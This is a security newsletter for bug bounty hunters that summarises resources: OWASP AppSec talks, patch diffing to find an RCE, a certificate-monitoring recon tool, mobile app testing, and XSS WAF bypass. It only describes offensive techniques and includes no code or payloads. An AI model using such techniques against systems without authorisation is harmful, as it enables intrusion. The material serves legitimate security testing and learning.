The 5 Hacking NewsLetter 86
Posted in Newsletter on December 31, 2019
Posted in Newsletter on March 19, 2019
Hey hackers! These are our favorite resources shared by pentesters and bug hunters last week.
This issue covers the week from 8 to 15 of March.
OWASP AppSec California 2019, especially:
- An Attacker’s View of Serverless and GraphQL Apps & Slides
- Endpoint Finder: A static analysis tool to find web endpoints, Slides & EndpointFinder
- Pose a Threat: How Perceptual Analysis Helps Bug Hunters & Slides
- Creating Accessible Security Testing with ZAP & Slides
- Cache Me If You Can: Messing with Web Caching & Slides
- Automated Account Takeover: The Rise of Single Request Attacks & Slides
- Open-source OWASP tools to aid in penetration testing coverage & Slides
- The Call is Coming From Inside the House: Lessons in Securing Internal Apps & Slides
OWASP AppSec conferences are great for anyone interested in (both offensive and defensive) Web app security. This one is particularly good, as you can judge from the list of talks above that I’m planning to watch!
Some of the topics addressed are: extracting endpoints from JS files, FaaS & GraphQL security, Web Caching vulnerabilities, scaling visual identification for bug hunters, new features in ZAP, interesting OWASP tools for white box pentesting…
The only thing missing is the video/slides from workshops which look really interesting. Gonna have to go there myself some day!
Have you ever found an open port on a target, and the service’s version had a CVE but no disclosed exploit? This might happen a lot, especially on (internal) pentests where the number of open ports is generally higher than during bug bounty.
This article is a great example of you how to reverse engineer the patched version and locate the vulnerability - an RCE in this case, using diff (or rcdiff).
This is a new recon tool by @yassineaboukir who also wrote Asnlookup. They’re both very handy tools for bug hunters.
Sublert monitors changes in CT logs, and notifies you via Slack when a new SSL/TLS was issued for the organization you’re monitoring.
What’s new compared to existing CT monitoring tools like Facebook’s CT tool or CertSpotter is that it was created by a bug hunter for bug hunters. It won’t spam you with irrelevant results, you can enable DNS resolution, disable monitoring for specific domains, and since it’s in Python, you can integrate it with any bug hunting (automated) scripts you are already using.
This is an awesome presentation if you’re into mobile app testing! It’s understandable even without video.
The question answered is: how do you test the security of an app if for some reason you can’t use a rooted/jailbroken device? This happens when the app refuses to run on a rooted device, or when it requires an iOS version that doesn’t have a public jailbreak.
Solutions explained including commands and resources are:
This is a great resource for learning how to bypass WAFs for XSS, by the author of XSStrike & Photon.
I often see people sharing complex XSS payload on Twitter. But without context, I don’t find them very useful. This paper is a much better resource for understanding what filters do and how to bypass them with a solid methodology, as opposed to randomly running a list of payloads.
The steps proposed are:
See more writeups on The list of bug bounty writeups.
We created a collection of our favorite pentest & bug bounty related tweets shared this past week. You’re welcome to read them directly on Twitter: Tweets from 03/08/2019 to 03/15/2019
Have a nice week folks!
If you enjoyed reading this, please consider sharing it, leaving a comment, suggestions, questions…